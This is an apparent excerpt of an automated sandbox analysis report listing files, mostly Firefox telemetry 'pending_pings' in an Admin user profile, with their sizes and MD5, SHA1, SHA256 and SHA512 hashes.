SHA25645048c70fcdeb6eb9edad688b5a5b003b284b1ada2dfa6132f34f2204d1376a1
SHA5126006d116136098a516bc1e1722d627fd39b37702eca28634e31d2fc5618e252298666e08a140e7631a2726a062c0dafe77fdf25f0b2eb9f5662eced5cc6a90ec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\4dd10bdd-0791-4c73-8394-e75295d8c5dd
Filesize2KB
MD5bca4baf2ee6887bea2ce719360d8e09d
SHA15775aff6cd42ed89c0854ec092cb470d7a3e0c4a
SHA2561c4cc7c7412069cb71cf84f8739af729a1d5888606fb4323a6c9009bce8c4c22
SHA512d9583a013588ec819c9a2e2379967140c5421167b6201dab878e602580d6728a4a8a0440ab3f2c0cb642c69e36df7e5d653062bcc349bb661c458f2f10682cb3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\4f9fee1c-bc1b-4b32-b514-0353d6b8a34a
Filesize16KB
MD516d1e287e5c79676d7ceea5c68d4762b
SHA1202a9275d0efd5ea27399a39068b460a545b5393
SHA256738f7ddf3760e8d54dec2e9351c4b45b7aa4100bd120669ce86193f85e594ef8
SHA512ee5c6f9cbb088ddbec15268d0cb4a30b61293c83a1c52ba26343d291d2c94e94ae3c5257507922e2bce540783f31bdd286aaa461f015fba1a5ab63b73f338a30
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\627e49f5-fb2f-4a76-ab4d-22baa48737d9
Filesize886B
MD54901468f193149532ff85062e1ce36f7
SHA1e836cc22a5dcaad5a9b20b14e1e57b383444d281
SHA256886808994e8727f6b9c2908836600f2748aeed1f81197bd0a27cb52bff11c115
SHA51243766208fc313fe327f1ee8355edd8acd22ce0bd69790d42e9db1a8e38115b0dc0ed3bf9d145bf9a43b0b6effe8ec42428433445ee22de082960ab82982f736e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\6e61912f-d6fc-4355-bc98-f4e2d519a534
Filesize883B
MD5ad9f2b5f3508f0f48e8fbd7e3d0b956f
SHA19408b881e23da58cad7dbdd22fa81eae2aefd4d2
SHA2563f288ca8adf586b5b04984beb03b6a21a6878ff7bc469f116741e48c8b2d6da3
SHA5125c4ec48e229ba0c69543d9b5597b1b1165946dc7e00f0af8badf66849e9a4ee2bcde6795bd46c753062a2f0c2b7d7ca6fd319e714bd1360da9cfa1f66abcc508
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\c33b9ce1-8b96-4d05-89bc-08f4eaf05ebf
Filesize235B
MD59090f41746f52e0b666538aacd4a1365
SHA11331fcaa0d7a24fe11cdbc71f4eba4f91ea6fc0e
SHA2563ef53bf66a2eb9fe9449891000586083cb688f0a1cf9040fe1df39d97f450a17
SHA512cd91ba3dd166490c2bfcd65a1a6a7591707f790dc6563642319b6f424c5e0c61ab17ad57982fc7feeab17399b3af24dd26602663097c747d64f439f2c11a4294
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\datareporting\glean\pending_pings\d677c066-045e-4ff6-9750-f90c0873b683
Filesize235B
MD5b012b00d67970caeefedf1961793b6be
SHA1645934fa4546b03d72e24ece2d0e0368e39da0a5
SHA25639202d6844d5e69d63d07af3e48f88e459373bd51328c616fdf269b8eeb5e303
SHA512bbbbea759d6cf9679c39e17d278774db9594ed0fcce34f697bda7e1a8a9cf1a68ee2ce7f5461b7fe1211677a29d36f13ada7ecb0954003d8deb95da891a3fa06
-
Filesize
6KB
MD53586101b91ba385f3f4f51e1d16f4f01
SHA11d90a4dd69d1d7d791d265b588d8a2201eed4a8f
SHA256e2124a3b0c8b42ad9a1174b290628192205081908b5243b60b5bad40c4edeeb6
SHA512caa0db4710fc8afbba2e7593f3cf7152bf82bf0328baff89529f0b4c210315f58a5b4e15b7b0e3777fc921c593e0cd01a0fa0ab36b5953a270d55a6bc4d1db45
-
Filesize
6KB
MD54ba145c8e2688ab55cccad9eaf251eeb
SHA1f745c628164fd48c24ba3ac0dc3923745e522d9d
SHA25624d7c7fd30e022f87aa7b6e3908d45a77204950b6e8a0a01853e5510744b9321
SHA5124c5fa79cb408a96cbf364895f23b01228c320bac70daf5b99b07abf021f4c709279ee85cefe8c38af052d4a000633a38d37b16bca16195cd238c5db4017ce988
-
Filesize
1.6MB
MD51a941a7c7934939c0724e7798f439577
SHA12eb71f97cb566e4820b69508d783cf897e6f2332
SHA2566c736a7ccdc23d592f2eb23813541dcb6872dc4e240e8172c594950f4ddaf6fe
SHA5124d6128d5ef51508f7b65696807f25b7ae9594dc3829ff7d787a5f72757f070d860173e29bd86d730cd103cb7c1e1f08c75f117a0f2cebead75188f6ece77a5e5
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f